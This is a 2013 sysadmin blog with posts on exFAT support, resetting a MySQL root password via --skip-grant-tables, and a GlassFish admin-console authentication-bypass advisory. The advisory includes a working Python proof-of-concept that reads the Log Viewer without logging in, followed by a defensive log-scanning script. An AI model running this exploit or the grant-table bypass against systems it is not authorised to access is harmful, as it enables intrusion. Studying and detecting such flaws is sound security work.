Friday, November 1, 2013

How do I install and mount an exFAT partition?

Microsoft introduced the new exFAT file system with Vista SP1. Extended File Allocation Table (exFAT) is the successor to the old FAT32 file system [1].

As the very first step, you may need to add the relevant PPA to your software sources. To add the correct repository on Ubuntu 13.04 and lower:
$sudo apt-add-repository ppa:relan/exfat

To add the correct repository to Ubuntu 13.10:
$sudo add-apt-repository ppa:relan/exfat

To update your package list:
$sudo apt-get update

To search for packages pertaining to exfat, the following command can be used.
$apt-cache search exfat

Then it will display the following packages.
fuse-exfat - This driver is the first free exFAT file
exfat-utils - A set of utilities for creating, checking, dumping and labelling

To install these packages, the following command can be used.
$sudo apt-get install exfat-utils fuse-exfat

During this process, the following extra packages will be installed:
  fuse-utils
The following NEW packages will be installed:
  exfat-utils fuse-exfat fuse-utils

The easiest way to mount the exFAT disk is, once the above installation is over, to plug in the storage device. It will be auto-mounted.

Reference:
[1] http://www.tech-recipes.com/rx/2801/exfat_versus_fat32_versus_ntfs/#sthash.Dqeow04Z.dpuf

Monday, October 28, 2013

Reset mysql root Password

I wanted to reset the mysql root password of one of my temporarily hosted mysql database servers. Since it was not used for a long period of time, I couldn't remember the root password correctly.

As the first step, I logged into the server as the root user. I was using an Ubuntu 12.04 server.

First log in to the system as a normal user and then 'sudo' to get root access.

As the second step, it was necessary to stop the mysql daemon using one of the following commands.
$/etc/init.d/mysql stop
$service mysql stop

Please note that either of the above commands works fine.

As the third step, I started up the mysql daemon and skipped the grant tables which store the passwords using the following command.
$mysqld_safe --skip-grant-tables

As the next step I connected to mysql without a password.
$mysql --user=root mysql

As the final step, I entered the following command to set a password for the root user.
mysql> UPDATE user SET Password=PASSWORD('new-password') WHERE user='root'; FLUSH PRIVILEGES;

The following form of the command also worked as expected:
mysql> UPDATE mysql.user SET Password=PASSWORD('new-password') WHERE User='root'; FLUSH PRIVILEGES;

Hope this works fine for you too. :)

Tuesday, March 5, 2013

Security Vulnerabilities: Oracle GlassFish Server Administration Console Authentication Bypass

Description: A server vulnerable to the Oracle GlassFish Server Administration Console GET Request Authentication Bypass fails to enforce authentication on HTTP requests that contain lower-case method names (e.g. 'get'). A remote, unauthenticated attacker could exploit this to upload and execute arbitrary code.


Vulnerable packages:
    Oracle GlassFish Server 3.0.1
    Sun GlassFish Enterprise Server 2.1.1

Non-vulnerable packages:
    Oracle GlassFish Server 3.1
    Contact Oracle for patches for other GlassFish versions

Workaround suggested by Core Security [1]:

For users who cannot upgrade to the latest patched version, the following workaround can be applied in order to avoid this flaw:
  1. In the GlassFish Admin Console, go to the Tasks tree.
  2. Navigate through: Network Config > Protocols > admin-listener > HTTP.
  3. There is a checkbox "Trace: Enable TRACE operation" (checked by default); uncheck it and then save changes.
  4. Finally, restart GlassFish by running asadmin from the bin directory, e.g. C:\glassfishv3\bin>asadmin restart-domain
Checking for the vulnerability:

The Nessus scanner can be used to check whether a server is affected by this vulnerability.


The following Python code published by Core Security is a Proof-of-Concept of the vulnerability; it retrieves the content of the Log Viewer, effectively bypassing the authentication [1]:

import sys
import httplib  # Python 2 standard library (http.client in Python 3)

def make_trace_request(host, port, selector):
    """Send a single HTTP TRACE request for 'selector' and print the reply."""
    print '[*] TRACE request: %s' % selector
    # Browser-like request headers; 'Connection: close' ends the connection after one reply
    headers = { 'User-Agent': 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)',
                'Host': '%s:%s' % (host, port),
                'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
                'Accept-Language': 'en-us,en;q=0.5',
                'Accept-Charset': 'ISO-8859-1,utf-8;q=0.7,*;q=0.7',
                'Accept-Encoding': 'gzip,deflate',
                'Connection': 'close',
                'Referer': 'http://%s:%s%s' % (host, port, selector)}

    conn = httplib.HTTPConnection(host, port)
    conn.request('TRACE', selector, headers=headers)
    response = conn.getresponse()
    conn.close()

    # A 200 reply carrying the Log Viewer page shows that no login was required
    print response.status, response.reason
    print response.getheaders()
    print response.read()

if len(sys.argv) != 3:
    print "Usage: $ python poc.py <host> <port>\nE.g:   $ python poc.py 192.168.0.1 4848"
    sys.exit(0)

host = sys.argv[1]
port = int(sys.argv[2])
# The admin console's Log Viewer page, which normally requires an authenticated session
make_trace_request(host, port, '/common/logViewer/logViewer.jsf')
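As an added example (not part of the original post or of Core Security's advisory), here is the defender's side of the same issue: a small access-log check that flags admin-console requests using a non-uppercase method name or the TRACE method, the two request shapes described above, and reports whether the server served them with a 200. The log lines are constructed samples in Common Log Format, and the /common/ path prefix is assumed from the PoC's target path.

```python
import re

# Constructed sample lines in Common Log Format; not real traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [05/Mar/2013:10:01:02 +0000] "GET /common/index.jsf HTTP/1.1" 401 0
10.0.0.9 - - [05/Mar/2013:10:01:07 +0000] "get /common/logViewer/logViewer.jsf HTTP/1.1" 200 5120
10.0.0.9 - - [05/Mar/2013:10:01:09 +0000] "TRACE /common/logViewer/logViewer.jsf HTTP/1.1" 200 5120
10.0.0.7 - - [05/Mar/2013:10:02:00 +0000] "POST /j_security_check HTTP/1.1" 302 0
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) \S+" (?P<status>\d{3}) ')

ADMIN_PREFIX = "/common/"  # assumed admin-console path prefix, taken from the PoC's target

def inspect_line(line):
    """Return a finding dict for a suspicious admin-console request, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    method, path, status = m.group("method"), m.group("path"), int(m.group("status"))
    reasons = []
    if method != method.upper():
        reasons.append("non-uppercase method name")   # e.g. 'get' instead of 'GET'
    if method.upper() == "TRACE":
        reasons.append("TRACE request")               # method the workaround disables
    if not reasons or not path.startswith(ADMIN_PREFIX):
        return None
    return {"ip": m.group("ip"), "time": m.group("ts"), "method": method,
            "path": path, "status": status, "reasons": reasons,
            "served": status == 200}   # 200 means the console answered without a login

def scan_log(text):
    """Apply inspect_line to every line of the log text and collect the findings."""
    return [f for f in map(inspect_line, text.splitlines()) if f]

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        state = "SERVED (200)" if f["served"] else "rejected"
        print("%s %s %s %s -> %s: %s" % (f["time"], f["ip"], f["method"],
                                         f["path"], state, ", ".join(f["reasons"])))
```

Point the scan at the admin listener's access log rather than at the constructed sample; requests that are both flagged and served with a 200 are the ones worth investigating.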


Reference

[1] http://www.coresecurity.com/content/oracle-glassfish-server-administration-console-authentication-bypass
[2] http://www.securityfocus.com/archive/1/517965/30/0/threaded